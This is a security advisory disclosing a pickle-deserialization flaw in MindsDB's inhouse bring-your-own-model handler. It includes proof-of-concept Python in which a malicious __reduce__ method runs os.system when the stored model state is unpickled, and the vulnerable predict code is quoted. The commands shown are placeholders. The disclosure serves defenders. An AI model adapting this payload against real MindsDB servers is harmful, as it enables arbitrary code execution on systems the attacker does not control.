SAI Security Advisory

Pickle Load on inhouse BYOM model prediction leads to arbitrary code execution

September 12, 2024

Products Impacted

This vulnerability is present in MindsDB versions v23.10.2.0 and newer.

CVSS Score: 7.1

AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data

Details

To exploit this vulnerability, an attacker authenticated to a MindsDB instance creates a Python script that trains a model on a dataset and makes predictions. Within the script, the attacker includes a class that produces a malicious pickle object inside the method used to train the model. The attacker then uses the ‘Upload Custom Model’ feature in the MindsDB UI to upload this Python script, along with the related requirements.txt file, which must list any libraries required to successfully achieve the exploit. Finally, the attacker uploads the relevant dataset as a file and runs the appropriate SQL query to train the model with the dataset and the uploaded script, as illustrated in the sketch below.
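The following is a minimal sketch of what such an uploaded model script could look like. The class names, method signatures, and payload command are illustrative assumptions rather than MindsDB API details; the essential element is that the train method stores an object whose __reduce__ method runs a command when the saved model state is later unpickled.

import os


class MaliciousPayload:
    # __reduce__ is invoked during unpickling, so the returned callable
    # executes on the MindsDB server when pickle.loads is called on the
    # stored model state.
    def __reduce__(self):
        return (os.system, ('id > /tmp/byom_poc',))


class MyModel:
    def train(self, df, target_col, args=None):
        # Stored as instance state; it is serialized together with the
        # model by pickle.dumps when the model is saved after training.
        self.payload = MaliciousPayload()

    def predict(self, df, args=None):
        # The prediction output is irrelevant; the command has already
        # run by the time this method is reached.
        return df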

When the model is trained, it is serialized along with the malicious pickle object due to the use of pickle.dumps within the train method of the ModelWrapperUnsafe class in the mindsdb/integrations/handlers/byom_handler/byom_handler.py file. This class is used when the BYOM engine is set to ‘inhouse’. When a prediction query is subsequently run on the model, the serialized model state is passed to the vulnerable predict method of the ModelWrapperUnsafe class in the same file, which calls pickle.loads on it, as shown below:

def predict(self, df, model_state, args):
    model_state = pickle.loads(model_state)
    self.model_instance.__dict__ = model_state
    try:
        result = self.model_instance.predict(df, args)
    except Exception:
        result = self.model_instance.predict(df)
    return result

This leads to the malicious pickle object being deserialized and any arbitrary code contained within it being executed on the server.
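The unsafe round trip can be reproduced in isolation with only the standard library, independent of MindsDB; the dictionary below stands in for the model state handled by ModelWrapperUnsafe, and the command is a harmless placeholder.

import os
import pickle


class Payload:
    def __reduce__(self):
        # Called during unpickling, mirroring what happens on the server.
        return (os.system, ('echo pickle payload executed',))


# Roughly what the train path does: serialize the model state, including
# the attacker-controlled attribute.
model_state = pickle.dumps({'payload': Payload()})

# Roughly what the predict path does: deserialize the stored state, which
# invokes Payload.__reduce__ and executes the command.
restored_state = pickle.loads(model_state)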
